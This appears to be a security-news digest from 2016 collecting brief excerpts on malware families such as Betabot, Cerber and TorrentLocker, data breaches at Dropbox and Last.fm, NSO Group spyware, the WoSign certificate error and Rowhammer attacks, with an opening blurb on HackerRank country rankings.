At HackerRank, we regularly post tens of thousands of new coding challenges for developers to improve their coding skills. Hundreds of thousands of developers from all over the world come to participate in challenges in a variety of languages and knowledge domains, from Python to algorithms to security to distributed systems. Our community is growing everyday, with over 1.5 million developers ranked.
Developers are scored and ranked based on a combination of their accuracy and speed.

According to our data, China and Russia score as the most talented developers. Chinese programmers outscore all other countries in mathematics, functional programming, and data structures challenges, while Russians dominate in algorithms, the most popular and most competitive arena. While the United States and India provide the majority of competitors on HackerRank, they only manage to rank 28th and 31st.
#1418 Kali Linux 2016.2 released as the most advanced penetration testing distribution
The Kali Linux (successor to BackTrack) developers are back from the DEF CON Vegas and Black Hat conferences for security professionals and ethical hackers, and as they promised earlier this year, they're now announcing the availability of Kali Linux 2016.2.

What's Kali Linux 2016.2? Well, it's an updated Live ISO image of the popular GNU/Linux distribution designed for ethical hackers and security professionals who want to harden the security of their networks, which contains the latest software versions and enhancements for those who want to deploy the OS on new systems.

It's been quite some time since the last update to the official Kali Linux Live ISOs, and new software releases are announced each day, which means that the packages included in the previous Kali Linux images are very old, and bugs and improvements are always implemented in the most recent versions of the respective security tools.
#1417 How spy tech firms let governments see everything on a smartphone
SAN FRANCISCO — Want to invisibly spy on 10 iPhone owners without their knowledge? Gather their every keystroke, sound, message and location? That will cost you $650,000, plus a $500,000 setup fee with an Israeli outfit called the NSO Group. You can spy on more people if you would like — just check out the company’s price list.

The NSO Group is one of a number of companies that sell surveillance tools that can capture all the activity on a smartphone, like a user’s location and personal contacts. These tools can even turn the phone into a secret recording device.

Since its founding six years ago, the NSO Group has kept a low profile. But last month, security researchers caught its spyware trying to gain access to the iPhone of a human rights activist in the United Arab Emirates. They also discovered a second target, a Mexican journalist who wrote about corruption in the Mexican government.
#1416 Android patch fixes Nexus 5X critical vulnerability
Google’s Android security team has patched a vulnerability that left Nexus 5X devices open to attack even if the phone’s screen was locked. The vulnerability in Google’s line of phones would have allowed an adversary to exfiltrate data from the targeted phone via a forced memory dump of the device.

Researchers at IBM’s X-Force Application Security Research Team discovered the flaw several months ago and worked with Google on a patch that was deployed recently. Disclosure of the vulnerability was shared by IBM’s X-Force team on Thursday.
#1415 Microsoft adds .NET core, ASP.NET to bug bounty program
Microsoft is stepping up its bug hunting efforts surrounding its Visual Studio development suite, adding Microsoft .NET Core and ASP.NET Core to its Bug Bounty program.

The bounties opened yesterday and will run “indefinitely,” according to Microsoft. The bounty program includes the Windows and Linux versions of .NET Core and ASP.NET Core.
#1414 And the worst passwords from the Last.fm hack are…
Apparently user passwords were stored using unsalted MD5 hashing, which LeakedSource says took two hours to convert into readable plaintext passwords.

While Last.fm’s password encryption left much to be desired, sadly the breached passwords themselves weren’t much better.

The most popular password by far? “123456” – yes, seriously.
#1413 Why identity protection is the next phase in security
Talk to any security expert, and sooner or later the line "It's not a case of if you are hacked, but when" will be trotted out. It's a good line because it is true and demonstrates how perimeter-style security has fallen by the wayside.

But consider the implicit implications of everyone eventually being breached, not as a sysadmin or security specialist, but as a user of services, and you will realise what it means for your personal information.

Whether today, tomorrow, or next year, eventually the personal information you have handed over to third parties is going to find its way online, and there is not a thing you can do to stop it.
#1412 This data-stealing Trojan is the first to also infect you with ransomware
As if stealing your personal data wasn't bad enough, one form of Trojan malware has now become the first of its kind by also infecting victims with ransomware, forcing targets to pay to regain access to their computer as well as compromising their credentials.

Betabot, which steals banking information and passwords, has been around since March 2013. It disables antivirus and malware-scanning software on infected Windows machines before modifying them to steal users login credentials and financial data.

But now, according to cybersecurity researchers at Invincea, Betabot is "breaking new ground", becoming the first known weaponised password-stealing malware that also infects victims with ransomware in a second stage of attack.
#1411 Report: Smartphone infection rate doubled in first half of 2016
Smartphone infection rates nearly doubled during the first half of this year, from 0.25 percent to 0.49 percent compared to the second half of 2015, according to a report released today by Nokia.

Nokia provides endpoint malware detection services to major mobile carriers and covers 100 million devices around the world, with the exception of China and Russia, said Kevin McNamee, director of the Nokia Threat Intelligence Lab.

Android is the most targeted device, accounting for 74 percent of the infections.

IPhones accounted for 4 percent and Windows phones did not show up in the statistics, due to their low market share and low infection rates.

The remaining 22 percent of infections were laptops and personal computers connecting via tethered smartphones or WiFi hotspots.

Infection rates varied by month, with a spike in April. Mobile infections hit an all-time high that month, with one out of every 120 smartphones having some form of malware infection, such as ransomware, spyphone applications, SMS Trojans, personal information theft and overly aggressive adware.
#1410 TorrentLocker: Crypto-ransomware still active, using same tactics
In December 2014, ESET released a white paper about TorrentLocker, a crypto-ransomware family spreading, via spam, email messages that impersonated local postal service, energy or telecom companies. The paper described its distribution scheme, its core functionalities, its network protocol and exposed some similarities with the Hesperbot banking trojan.

During the last few months, we decided to take a look at new samples to check the current state of this malware family. This article summarizes the results of our analysis and compares the 2016 campaigns against our research from late 2014.
#1409 New OSX security updates patch same zero-days as iOS 9.3.5
Late last week, Apple released iOS 9.3.5 to patch three zero-day bugs that could be used to access personal data on an infected phone. Dubbed "Trident," the bugs were used to create spyware called Pegasus that was used to target at least one political dissident in the United Arab Emirates.

Today, Apple has released updates for Safari 9 and OS X El Capitan and Yosemite that collectively patch the three "Trident" bugs in its desktop operating system. It's not clear whether the bugs affect Mavericks or any older versions of OS X, but we've reached out to Apple for comment and will update the article if we receive a response
#1408 New cloud attack takes full control of virtual machines with little effort
The world has seen the most unsettling attack yet resulting from the so-called Rowhammer exploit, which flips individual bits in computer memory. It's a technique that's so surgical and controlled that it allows one machine to effectively steal the cryptographic keys of another machine hosted in the same cloud environment.

Until now, Rowhammer has been a somewhat clumsy and unpredictable attack tool because it was hard to control exactly where data-corrupting bit flips happened. While previous research demonstrated that it could be used to elevate user privileges and break security sandboxes, most people studying Rowhammer said there was little immediate danger of it being exploited maliciously to hijack the security of computers that use vulnerable chips. The odds of crucial data being stored in a susceptible memory location made such hacks largely a matter of chance that was stacked against the attacker. In effect, Rowhammer was more a glitch than an exploit.
#1407 “Foghorn” takes users out of phish-fighting with DNS “greylisting”
Clickers gonna click. Despite mandatory corporate training, general security awareness, and constant harping about the risks of clicking on unverified links in e-mails and other documents, people have been, are now, and forever will click links where exploit kits and malware lurk. It's simply too easy with the slightest amount of targeted work to convince users to click.

Eric Rand and Nik Labelle believe they have an answer to this problem—an answer that could potentially derail not just phishing attacks but other manner of malware as well. Instead of relying on the intelligence of users, Rand and Labele have been working on software that takes humans completely out of the loop in phishing defense by giving clicks on previously unseen domains a time out, "greylisting" them for 24 hours by default. The software, a project called Foghorn, does this by intercepting requests made to the Domain Name Service (DNS).
#1406 Research: Companies fear mobile devices as massive cybersecurity threat
According to an online poll conducted by Tech Pro Research in June, everyday threats like security breaches involving mobile devices are more worrisome than acts of cybercrime.
#1405 Cybercrime and cyberwar: A spotter's guide to the groups that are out to get you
Cybercriminals are as varied as other internet users: just as the web has allowed businesses to sell and communicate globally, so it has given fraudsters the ability to plunder victims anywhere and set up crime networks that, previously, would have been impossible.

The web has become central to the smooth running of most developed economies, and the types of cybercrime have changed too. While 15 years ago the majority of digital crime was effectively a form of online vandalism, most of today's internet crime is about getting rich. "Now the focus is almost entirely focused on a some kind of pay-off," says David Emm, principal security researcher at Kaspersky Lab.
#1404 How one man could have owned GitHub, and what happened next…
A WoSign customer wanted to acquire a certificate for the server name med.ucf.edu, a subdomain of the University of Central Florida’s domain ucf.edu.

The customer was duly authorised to run this subdomain, which belongs to the College of Medicine, so WoSign was correct to approve it.

However (and, in hindsight, by good fortune), the customer also accidentally applied for a certificate for www.ucf.edu, presumably having mistyped www.med.ucf.edu.

To his surprise (I am guessing at the customer’s gender here), the second application was approved as well.

This turned out to be more than just a one-off, because the customer did a second test, using a certificate in the name of another domain he had the right to control, namely anaccount.github.com (and anaccount.github.io).

Deliberately following the same faulty path that he had followed by mistake in his previous application, he ended up with a vouched-for certificate for all of github.com, github.io, and www.github.io.

As these are the primary server names for the popular source code hosting service GitHub, this would have been a blunder with serious consequences if a crook were to have spotted this trick and acquired the dodgy GitHub certificate with cybercrime in mind.
#1403 Building a new Tor that can resist next-generation state surveillance
Since Edward Snowden stepped into the limelight from a hotel room in Hong Kong three years ago, use of the Tor anonymity network has grown massively. Journalists and activists have embraced the anonymity the network provides as a way to evade the mass surveillance under which we all now live, while citizens in countries with restrictive Internet censorship, like Turkey or Saudi Arabia, have turned to Tor in order to circumvent national firewalls. Law enforcement has been less enthusiastic, worrying that online anonymity also enables criminal activity.

Tor's growth in users has not gone unnoticed, and today the network first dubbed "The Onion Router" is under constant strain from those wishing to identify anonymous Web users. The NSA and GCHQ have been studying Tor for a decade, looking for ways to penetrate online anonymity, at least according to these Snowden docs. In 2014, the US government paid Carnegie Mellon University to run a series of poisoned Tor relays to de-anonymise Tor users. A 2015 research paper outlined an attack effective, under certain circumstances, at decloaking Tor hidden services (now rebranded as "onion services"). Most recently, 110 poisoned Tor hidden service directories were discovered probing .onion sites for vulnerabilities, most likely in an attempt to de-anonymise both the servers and their visitors.
#1402 New version of Cerber ransomware distributed via malvertising
Cerber has become one of the most notorious and popular ransomware families in 2016. It has used a wide variety of tactics including leveraging cloud platforms and Windows Scripting and adding non-ransomware behavior such as distributed denial-of-service attacks to its arsenal. One reason for this popularity may be because it is frequently bought and sold as a service (ransomware-as-a-service, or RaaS).

The latest version of Cerber had functions found in earlier versions like the use of voice mechanism as part of its social engineering tactics. Similar to previous variants, Cerber 3.0 is dropped by the Magnitude and Rig exploit kits.
#1401 Dropbox hackers stole e-mail addresses, hashed passwords from 68M accounts
Dropbox hurriedly warned its users last week to change their passwords if their accounts dated back prior to mid-2012. We now know why: the cloud-based storage service suffered a data breach that's said to have affected more than 68 million accounts compromised during a hack that took place roughly four years ago.

The company had previously admitted that it was hit by a hack attack, but it's only now that the scale of the operation has seemingly come to light.

Tech site Motherboard reported—citing "sources in the database trading community"—that it had obtained four files, totalling 5GB in size, which apparently contained e-mail addresses and hashed passwords for 68,680,741 Dropbox users.
#1400 Fairware attacks targeting Linux servers
Linux server admins are reporting attacks resulting in the disappearance of the server’s web folder and websites being down indefinitely.

Posts to the forums on the BleepingComputer website corroborate a number of such attacks, most likely intrusions powered by brute-force attacks against SSH, according to one of the victims. In each instance, the web folder is deleted and a read_me file is left behind containing a link to a Pastebin page hosting a ransom note. The note demands two Bitcoin in exchange for the safe return of the files.
#1399 So much for counter-phishing training: Half of people click anything sent to them
Security experts often talk about the importance of educating people about the risks of "phishing" e-mails containing links to malicious websites. But sometimes, even awareness isn't enough. A study by researchers at a university in Germany found that about half of the subjects in a recent experiment clicked on links from strangers in e-mails and Facebook messages—even though most of them claimed to be aware of the risks.

The researchers at the Friedrich-Alexander University (FAU) of Erlangen-Nuremberg, Germany, led by FAU Computer Science Department Chair Dr Zinaida Benenson, revealed the initial results of the study at this month's Black Hat security conference. Simulated "spear phishing" attacks were sent to 1,700 test subjects—university students—from fake accounts.
#1398 Thousands of security threats happen every five minutes: Trend Micro VP
In just five minutes, files on a company's network can be encrypted and beyond its reach, according to Rik Ferguson, vice president of Security Research at Trend Micro.

Trend Micro has seen a lot of development around ransomware capabilities targeting businesses rather than consumers, Ferguson said during his keynote speech at Cloudsec Australia 2016 in Sydney on Thursday, with 1,800 new threats released out into the wild every five minutes.

Additionally, he said that more than 800,000 people are exposed to malicious URLs, exploit kits, phishing websites, malware, spam, and threats every five minutes, with almost 7,000 records on average being exposed in the same timeframe.

"Just so we can measure the speed of things, the fastest trains today ... can reach top speed of about 450km/h. That means in five minutes, you can travel close to 40 kilometres. That's an incredible distance to be able to go in a very, very short period of time," Ferguson pointed out.
#1397 SWIFT warns banks of more cyberattacks
Reports of additional attacks against banks that use SWIFT, the global financial transaction messaging network, came to light Wednesday. The attacks were reportedly persistent, sophisticated and in some cases successful, impacting an undisclosed number of financial institutions.

It’s the latest development since February when cybercriminals used SWIFT to steal $81 million in a Bangladesh Bank heist. Reports of the latest bank attacks come from a private letter obtained by the Reuters news agency sent by SWIFT to its clients informing them of the attacks and urging them to shore-up their cyber defenses.

The letter told clients that SWIFT customer “environments” have been compromised and that the possibility of a “threat is persistent, adaptive and sophisticated – and it is here to stay,” according to the Reuters.

#1396 Chrome 53 fixes address spoofing vulnerability and 32 other bugs
Google continued its onslaught of summer Chrome patches Wednesday when it pushed out version 53 of the browser, fixing 33 bugs, half of which were rated “high” severity by the company.

Google paid at least $56,500 in rewards to researchers who discovered vulnerabilities in the browser this time through. The company is still determining how much to award several researchers who found bugs, while two vulnerabilities marked Wednesday were ultimately not applicable to the company’s bug bounty program.
#1395 Hackers stole over 43 million Last.fm accounts in 2012 breach
New details about a historical hack of music website Last.fm have come to light.

Last.fm, owned by CBS (which also owns ZDNet and sister website CNET), suffered a data breach in 2012, but details of the attack were not disclosed. Reports suggested the service had an estimated 40 million users at the time.

On Thursday, breach notification site LeakedSource, which obtained a copy of the database and posted details of the hack in a blog post, said more than 43.5 million accounts were stolen.
History
2017: 01 02 03 04 05
2016: 01 02 03 04 05 06 07 08 09 10 11 12